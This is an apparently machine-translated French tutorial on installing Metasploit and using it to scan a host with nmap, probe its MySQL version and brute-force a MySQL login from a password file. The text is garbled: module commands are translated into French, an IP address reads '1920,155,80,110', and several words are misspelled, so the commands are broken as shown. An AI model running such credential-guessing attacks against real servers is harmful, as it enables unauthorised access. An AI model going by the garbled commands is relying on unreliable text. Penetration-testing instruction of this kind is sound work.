Framework Metasploit pour tester la sécurité du serveur

Table des matières
Cadre Metasploit, c'est une outil pour développer et exécuter des exploits contre un ordinateur ou un serveur. Metasploit Framework a été écrit en langage Ruby, il est multiplateforme et nécessite un ordinateur puissant pour fonctionner, il existe une version payante et une version gratuite pour la communauté.
Il peut être téléchargé sur www.metasploit.com/framework/download
Nous allons installer dans Linux Ubutnu, mais cela fonctionne pour d'autres distributions en modifiant certaines commandes.
Nous accédons à la fenêtre du terminal et installons ruby, avant qu'il ne fonctionne avec perl mais il a été programmé complètement nouveau.
Nous installons les dépendances ruby ​​afin de pouvoir ensuite exécuter le framework.
 sudo apt-get install ruby ​​​​libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby 

Ensuite, en fonction de la version que nous téléchargeons 32 ou 64 bits à partir du termink, nous donnerons l'autorisation :
chmod + x metasploit-latest-linux-x64-installer.run

Nous lançons le programme d'installation et la fenêtre d'installation s'ouvrira :
sudo metasploit-latest-linux-x64-installer.run

Nous allons cliquer sur le Fordward suivant), nous définissons s'il va être installé en tant que service et le port qu'il va occuper, par défaut il utilise le 3790.
A la fin de l'installation depuis la fenêtre du terminal et avec un accès root nous mettons à jour le framework
avec la commande :
msfupdate

Metasploit est un programme sans environnement graphique qui s'exécute complètement dans le terminal. On accède au logiciel depuis le terminal avec la commande :
msfconsole

Connaître MSF en interne
MSF (cadre Metasploit) Il est structuré en une série de modules tels que :

Exploits Quels sont les scripts et programmes disponibles dans MSF et que l'on peut utiliser, ils sont organisés par système d'exploitation et catégories, par exemple exploits / windows / browser / qui sont les exploits disponibles pour les navigateurs fonctionnant sous Windows.

Charges utiles : C'est l'action qui sera menée si la vulnérabilité que nous testons peut être trouvée et exploitée.

Auxiliaire: les scripts auxiliaires avec différentes fonctions, telles que auxiliaire / scanner / portscan / tcp et en utilisant ce scanner de port tcp, nous obtiendrions le statut du port. Ce script est une alternative à Nmap.

Enconders : Ils codent un script pour échapper à certains antivirus et antispam.

Nous commençons un exemple de test, à partir du terminal que nous exécutons :
./msfconsole

L'invite Metsploit est msf> à partir de là, nous exécuterons tout et pour quitter, nous taperons simplement exit
On va commencer par scanner une ip avec nmap
msf> nmap -sV 190.155.80.110

Nous activons le module auxiliaire pour accéder aux outils de script qui permettront de travailler sur mysql. On peut aussi voir la version du module.

Nous scannons la version de mysql, pour des raisons évidentes l'ip est fictive et juste pour l'exemple :
 msf> auxiliaire (mysql_version)> définir RHOSTS 190.155.80.110 // définir l'ip distant msf> définir RHOSTS 192.155.80.110 msf> auxiliaire (mysql_version)> exécuter // vérifier la version mysql 

S'il est exécuté correctement, il peut renvoyer la version mysql :
[*] 190.155.80.110 exécute Mysql5.0

Un autre cas avec le module d'analyse et en essayant de changer l'utilisateur root de mysql :
 msf> use scanner / mysql / mysql_login msf> set USERNAME admin msf> set PASS_FILE /tmp/keys.lst // fichier texte avec les clés possibles l'une en dessous de l'autre msf> exploit 

Si cela fonctionne, nous pouvons nous connecter à mysql :
mysql -h 1920,155,80,110 -u admin -pkey

Vous contribuerez au développement du site, partager la page avec vos amis

wave wave wave wave wave